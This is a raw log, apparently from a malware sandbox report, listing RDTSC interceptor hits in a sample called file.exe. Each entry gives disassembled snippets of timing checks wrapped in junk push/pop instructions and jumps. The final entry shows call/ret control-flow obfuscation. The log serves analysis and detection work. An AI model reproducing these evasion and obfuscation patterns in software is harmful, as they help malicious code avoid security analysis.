Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5CE second address: 99F5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FFBC8B2DA96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5D9 second address: 99F5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5F8 second address: 99F5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FB8F second address: 99FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A041E second address: 9A0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0A01 second address: 9A0A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFBC91A3BDCh 0x0000000a jmp 00007FFBC91A3BDFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0C72 second address: 9A0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5FFD second address: 9A6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5300 second address: 9A5322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5322 second address: 9A5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5326 second address: 9A5338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A55C6 second address: 9A55D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jbe 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A55D9 second address: 9A5607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFBC8B2DA9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5607 second address: 9A560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A560C second address: 9A5613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5613 second address: 9A562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE3h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5A84 second address: 9A5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5A9E second address: 9A5AD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FFBC91A3BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC91A3BDDh 0x00000013 pushad 0x00000014 jmp 00007FFBC91A3BE2h 0x00000019 jo 00007FFBC91A3BD6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5C36 second address: 9A5C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnc 00007FFBC8B2DAB0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFBC8B2DA9Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA666 second address: 9AA68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FFBC91A3BD6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBC91A3BE1h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA68C second address: 9AA690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA690 second address: 9AA69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B1F07 second address: 9B1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B209B second address: 9B20A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B20A1 second address: 9B20A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B264B second address: 9B2653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2653 second address: 9B2685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFBC8B2DA96h 0x0000000a jmp 00007FFBC8B2DA9Ah 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FFBC8B2DAA6h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2908 second address: 9B290C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B290C second address: 9B2916 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2916 second address: 9B2922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2922 second address: 9B2926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2926 second address: 9B2937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFBC91A3BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2937 second address: 9B293C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B293C second address: 9B2976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC91A3BE8h 0x00000013 jmp 00007FFBC91A3BDDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2D8F second address: 9B2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2DA9 second address: 9B2DB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3423 second address: 9B3429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3429 second address: 9B3431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3431 second address: 9B3435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6075 second address: 9B6079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6079 second address: 9B6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAA83 second address: 9BAA8D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAA8D second address: 9BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5209 second address: 9C520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C520D second address: 9C5225 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FFBC8B2DA96h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D03A6 second address: 9D03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FFBC91A3BE2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BA0 second address: 9D8BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BA6 second address: 9D8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E027D second address: 9E0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0281 second address: 9E02A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E02A1 second address: 9E02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E02A5 second address: 9E02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E041F second address: 9E0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06C0 second address: 9E06DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jo 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06DC second address: 9E06FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FFBC8B2DA9Eh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06FD second address: 9E0722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC91A3BDEh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FFBC91A3BD6h 0x00000013 pop esi 0x00000014 ja 00007FFBC91A3BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E087B second address: 9E08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFBC8B2DA96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08A2 second address: 9E08AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08AE second address: 9E08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e je 00007FFBC8B2DA96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08CE second address: 9E08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A54 second address: 9E0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC8B2DA9Ch 0x0000000a popad 0x0000000b jo 00007FFBC8B2DAC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A70 second address: 9E0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A74 second address: 9E0A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A7A second address: 9E0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFBC91A3BD6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E142D second address: 9E1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3131 second address: 9E3137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3137 second address: 9E313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E313B second address: 9E3149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F22 second address: 9E2F3D instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 jmp 00007FFBC8B2DAA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F3D second address: 9E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F47 second address: 9E2F4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F4D second address: 9E2F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F69 second address: 9E2F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F6D second address: 9E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F88 second address: 9E2FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DA9Bh 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 jp 00007FFBC8B2DA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C1A second address: 9E5C24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C24 second address: 9E5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FFBC8B2DA96h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E58DE second address: 9E58E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F425C second address: 9F4260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F4260 second address: 9F426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FD7 second address: A02FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FDD second address: A02FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FFBC91A3BD6h 0x0000000d jmp 00007FFBC91A3BE5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FFF second address: A03005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A03005 second address: A0302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC91A3BE8h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FFBC91A3BD6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02B41 second address: A02B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A126A3 second address: A126B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12AF2 second address: A12B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12F85 second address: A12FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12FA8 second address: A12FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13129 second address: A13145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBC91A3BE6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13467 second address: A1346E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1360C second address: A13614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17CAF second address: A17D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFBC8B2DA98h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2C77h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FFBC8B2DA98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 call 00007FFBC8B2DA99h 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
